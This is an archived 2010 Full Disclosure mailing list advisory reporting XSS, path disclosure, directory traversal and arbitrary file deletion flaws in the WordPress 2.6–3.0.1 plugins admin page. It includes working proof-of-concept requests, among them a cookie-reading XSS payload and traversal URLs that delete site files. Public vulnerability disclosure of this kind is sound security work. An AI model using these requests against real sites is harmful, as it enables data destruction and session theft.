Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Multiple vulnerabilities in WordPress 2 and 3
From: "MustLive" <mustlive () websecurity com ua>
Date: Fri, 1 Oct 2010 22:06:45 +0300

Hello Full-Disclosure!

I want to warn you about Cross-Site Scripting, Full path disclosure,
Information Leakage, Directory Traversal, Arbitrary File Deletion and Denial
of Service vulnerabilities in WordPress.

For all these attacks it's needed to have access to admin account, or to
have account with rights for working with plugins. Or to attack admin or
other user with required rights via XSS, to find out token which designed to
protect against CSRF attacks.

So users of WordPress don't need to worry much about these holes (if to not
allow above-mentioned requirements). But these vulnerabilities will come in
useful to security researchers at access to admin panel or at existence of
XSS at the site. So it's better for WP developers to fix them.

-------------------------
Affected products:
-------------------------

Checked in WordPress 2.0.11, 2.6.2, 2.7, 2.8, 2.9.2, 3.0.1. Versions 2.0.х
are not vulnerable, because they have not such functionality. Vulnerable to
different vulnerabilities are WordPress 2.6 - 3.0.1 and potentially previous
versions.

----------
Details:
----------

While commenting XSS vulnerability in WordPress 3.0.1
(http://www.securityfocus.com/archive/1/513250), I mentioned additional
information concerning XSS vulnerability. These nuances concern and to
below-mentioned vulnerabilities. It's possible to attack as via parameter
checked[0], as via checked[1] and so on, and also via checked[]. In versions
WP 2.7 and higher it's possible to use parameter action=delete-selected, and
in versions 2.8 and higher it's also possible to use parameter
action2=delete-selected.

XSS (WASC-08):

As I pointed out in above-mentioned letter, in WordPress 2.6.x Cross-Site
Scripting attack is conducting differently. And there is almost no benefit
from this XSS.

For attack it's needed to send POST request to
http://site/wp-admin/plugins.php with parameters _wpnonce equal token's
value, delete-selected equal "Delete" and checked[] equal <body
onload=alert(document.cookie)>.

Vulnerable are WordPress 2.6.x and potentially previous versions.

Full path disclosure (WASC-13):

For attack it's needed to send POST request to
http://site/wp-admin/plugins.php with parameters _wpnonce equal token's
value, delete-selected equal "Delete" and checked[] equal "1".

Vulnerable are WordPress 2.6.x and potentially previous versions.

Full path disclosure (WASC-13):

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=1

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=1

Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and
higher).

Full path disclosure (WASC-13):

http://site/wp-admin/plugins.php

Full path is shown at page with plugins.

Vulnerable are WordPress 2.6 - 2.7.1.

Information Leakage (WASC-13) + Directory Traversal (WASC-33):

At page (in list under the link "Click to view entire list of files which
will be deleted") the list of files in current folder and subfolders is
shown.

In folder http://site/wp-content/plugins/:

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=

In folder http://site/wp-content/:

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1

Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and
higher). And also WordPress 2.6.х. In versions 2.6.х it's needed to send
appropriate POST request to http://site/wp-admin/plugins.php (as mentioned
above).

Arbitrary File Deletion (WASC-42) + DoS (WASC-10):

If to send above-mentioned request with parameter verify-delete=1, then it's
possible to delete files and folders in current folder and subfolders.
Taking into account Directory Traversal it's possible to delete as all
plugins, as all other files in other folders, including it's possible to
conduct DoS attack on the site (if to delete important files of WP). E.g.
with request checked[]=../../1 it's possible to delete the whole site.

http://site/wordpress-2.9.2/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1&verify-delete=1

http://site/wordpress-2.9.2/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1&verify-delete=1

Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and
higher). And also WordPress 2.6.х. In versions 2.6.х it's needed to send
appropriate POST request to http://site/wp-admin/plugins.php (as mentioned
above).

------------
Timeline:
------------

2010.08.14 - found the vulnerabilities.
2010.09.30 - disclosed at my site. As I already wrote many times to security
mailing lists (http://www.securityfocus.com/archive/1/510274), starting from
2008 I never more inform WP developers about vulnerabilities in WordPress.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4575/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]